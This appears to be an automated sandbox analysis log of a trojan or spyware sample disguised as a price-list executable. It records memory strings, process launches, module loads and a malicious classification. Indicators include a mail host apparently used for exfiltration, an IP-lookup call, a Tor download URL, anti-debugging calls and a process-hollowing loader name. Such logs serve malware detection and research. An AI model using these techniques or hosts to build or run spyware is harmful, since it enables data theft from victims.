                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://mail.electrobelarmino.pt
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://ocsp.digicert.com0C
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://ocsp.digicert.com0O
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://r3.i.lencr.org/05
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.606198397.0000000002E7B000.00000004.00000001.sdmpString found in binary or memory: http://r3.o.lencr.org0
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.381179952.0000000002871000.00000004.00000001.sdmp, WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
                  Source: WerFault.exe, 0000000B.00000003.390219743.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: http://www.digicert.com/CPS0
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                  Source: PRICE LIST (NOVEMBER 2020).exeString found in binary or memory: https://www.digicert.com/CPS0
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.408840217.0000000007761000.00000004.00000001.sdmp, PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.601396712.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.604780526.0000000002B11000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380542993.0000000000BCB000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 0_2_027DA0D0 NtSetInformationThread,0_2_027DA0D0
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 0_2_027DAE21 NtSetInformationThread,0_2_027DAE21
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 0_2_027D06900_2_027D0690
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 0_2_027D2AD80_2_027D2AD8
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 0_2_027D1BE90_2_027D1BE9
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 0_2_027D5BE10_2_027D5BE1
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 0_2_027D6E480_2_027D6E48
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 0_2_027DCDD80_2_027DCDD8
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 8_2_00E46ACD8_2_00E46ACD
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 8_2_00E45B508_2_00E45B50
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 8_2_00F846A08_2_00F846A0
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 8_2_00F845B08_2_00F845B0
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeCode function: 8_2_00F8D2818_2_00F8D281
                  Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1592
                  Source: PRICE LIST (NOVEMBER 2020).exeStatic PE information: invalid certificate
                  Source: PRICE LIST (NOVEMBER 2020).exeBinary or memory string: OriginalFilename vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380026747.00000000004E2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVHQefUyV.exe2 vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.383382280.0000000002E38000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePpFY VOt.exe2 vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380837285.0000000000E30000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRunPeBraba.dll6 vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380542993.0000000000BCB000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.408068752.00000000069D0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.407827121.00000000068E0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.391196809.0000000005730000.00000002.00000001.sdmpBinary or memory string: originalfilename vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.391196809.0000000005730000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.390833495.0000000004DF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exeBinary or memory string: OriginalFilename vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.603002518.0000000000EA0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx.mui vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.603514060.0000000000FAA000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.601471388.0000000000842000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVHQefUyV.exe2 vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.610163268.0000000006030000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.602969148.0000000000E90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamewshom.ocx vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.601396712.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamePpFY VOt.exe2 vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000008.00000002.609887312.0000000005C60000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exeBinary or memory string: OriginalFilenameVHQefUyV.exe2 vs PRICE LIST (NOVEMBER 2020).exe
                  Source: PRICE LIST (NOVEMBER 2020).exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbi18
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/4@2/1
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7024
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4540:120:WilError_01
                  Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERB99A.tmpJump to behavior
                  Source: PRICE LIST (NOVEMBER 2020).exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: PRICE LIST (NOVEMBER 2020).exeReversingLabs: Detection: 25%
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeFile read: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe 'C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe'
                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1
                  Source: unknownProcess created: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe
                  Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 1592
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeProcess created: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exe C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 1Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32Jump to behavior
                  Source: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: PRICE LIST (NOVEMBER 2020).exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: PRICE LIST (NOVEMBER 2020).exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: Binary string: System.Configuration.pdbY source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: nphjVisualBasic.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380203854.00000000008F7000.00000004.00000010.sdmp
                  Source: Binary string: System.ni.pdb% source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmp
                  Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000B.00000003.392568947.0000000004F60000.00000004.00000040.sdmp
                  Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: System.Xml.pdb"" source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: clr.pdb source: WerFault.exe, 0000000B.00000003.392568947.0000000004F60000.00000004.00000040.sdmp
                  Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Windows.Forms.pdb-' source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: shlwapi.pdb% source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: rtutils.pdbE source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).PDB source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380203854.00000000008F7000.00000004.00000010.sdmp
                  Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: i.pdb source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: urlmon.pdb! source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: msvcp_win.pdbL source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: edputil.pdbg source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbp source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380744894.0000000000C9B000.00000004.00000020.sdmp
                  Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: nsi.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: WLDP.pdbS source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.ni.pdbRSDS source: WERB99A.tmp.dmp.11.dr
                  Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: ole32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: indows.Forms.pdb" source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: PRICE LIST (NOVEMBER 2020).PDBr source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380203854.00000000008F7000.00000004.00000010.sdmp
                  Source: Binary string: rasadhlp.pdb- source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Users\user\Desktop\PRICE LIST (NOVEMBER 2020).PDBY source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380724372.0000000000C80000.00000004.00000020.sdmp
                  Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb13 source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: ole32.pdb@ source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: cryptsp.pdbR source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: combase.pdb source: WerFault.exe, 0000000B.00000003.391966580.0000000004F62000.00000004.00000040.sdmp
                  Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WERB99A.tmp.dmp.11.dr
                  Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: System.Xml.ni.pdbRSDS source: WERB99A.tmp.dmp.11.dr
                  Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000B.00000003.392115452.0000000004F91000.00000004.00000001.sdmp
                  Source: Binary string: System.Xml.pdb-' source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbzI source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380581139.0000000000BFE000.00000004.00000020.sdmp
                  Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: ore.pdb\\ source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: System.ni.pdbT3el source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: System.Core.ni.pdbRSDSD source: WERB99A.tmp.dmp.11.dr
                  Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: diasymreader.pdb_ source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp
                  Source: Binary string: System.Xml.ni.pdb-' source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000000B.00000003.392204198.0000000004F61000.00000004.00000040.sdmp
                  Source: Binary string: shcore.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000B.00000003.391923928.0000000004F6B000.00000004.00000040.sdmp
                  Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000B.00000003.392568947.0000000004F60000.00000004.00000040.sdmp
                  Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: shell32.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
                  Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000B.00000002.417601833.0000000005180000.00000004.00000001.sdmp, WERB99A.tmp.dmp.11.dr
                  Source: Binary string: propsys.pdb5 source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb*0 source: PRICE LIST (NOVEMBER 2020).exe, 00000000.00000002.380681653.0000000000C5B000.00000004.00000020.sdmp
                  Source: Binary string: iertutil.pdb} source: WerFault.exe, 0000000B.00000003.392017324.0000000004F73000.00000004.00000040.sdmp
                  Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000B.00000003.391979190.0000000004F67000.00000004.00000040.sdmp
